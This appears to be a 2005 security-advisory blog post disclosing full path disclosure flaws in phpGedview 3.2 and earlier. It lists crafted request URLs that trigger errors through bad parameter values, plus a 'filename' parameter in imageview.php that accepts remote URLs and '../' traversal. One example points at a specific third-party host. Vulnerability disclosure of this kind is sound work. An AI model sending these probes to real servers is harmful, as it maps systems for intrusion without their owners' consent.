Multiple full path disclosure in phpGedview 3.2 and prior

Tuesday, February 01, 2005
Multiple full path disclosure in phpGedview 3.2 and prior:

PhpGedview is a web based tree for indexing and ordening all geanologic entries.
a user can look and present the information by diferens querys.

This aplication have various imput validations errors
and reveal some data to remote users.

#######################################################
variable 'level' and 'parent[0]'in file 'placelist.php'
#######################################################

if we change the value of the variable 'level' to other was not exit...

http://[target]/phpGedView/placelist.php?level=01
http://[target]/phpGedView/placelist.php?level=4000000000
(number of error lines show)

if we change the value of the array on variable 'parent[0]' to a non
existen array value...or a letter

http://[target]/phpGedView/placelist.php?action=show&level=1
&parent[1]=Click+edit+and+change+me

http://[target]/phpGedView/placelist.php?action=show
&parent[x]=Misnaged&level=0

http://dismarking.freefronthost.com/phpGedView/placelist.php?
action=find&level=1&parent[x]=Click+edit+and+change+me

here if we change the variable 'level' obtain the error again

http://[target]/phpGedView/placelist.php?action=show&parent[x]=
Misnaged&level=4000 (level=4000 number of error lines show)

we can make some convinations...

###########################################################
variable 'pids[0]' in file timeline.php
###########################################################

if we change the value of the array 'pids[0] to a non existant number
or a letter we found again the error.

http://[target]/phpGedView/timeline.php?pids[x]=I2222


###########################################################
variable not defined in file 'help_text.php'
###########################################################

in this file for make an error we need only a invent a variable
(in the example 'lala')

http://[target]/bin/phpgedview/help_text.php?lala=lala

we get aganin full path disclosure.


############################################################
variable 'filename' in 'imageview.php'
############################################################

variable filename is not validate porperly and permits inport
files to other sites.

http://[target]/imageview.php?filename=http://[remote]/logo.gif

and we can obtain again a full path instalation

http://[target]/imageview.php?filename=../ or some invalid data.



############################################################
change name of lenguage by a number causes a sesion crachses
############################################################

wen we change to another language , in the finish of the url we
have the word of language use.
If we change this value for a numbres we crachs the session,
and full path reveal.

http://[target]/phpGedView/individual.php?pid=I1&ged=pruebas2.ged
&changelanguage=yes&NEWLANGUAGE=1


############################################################


atentamente
Lostmon (lostmon@gmail.com)
thnx to estrella to be my light
thnx to all one that believes in my

La curiosidad es lo que hace mover la mente...
Post by Lostmon in 4:08:00 AM
 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...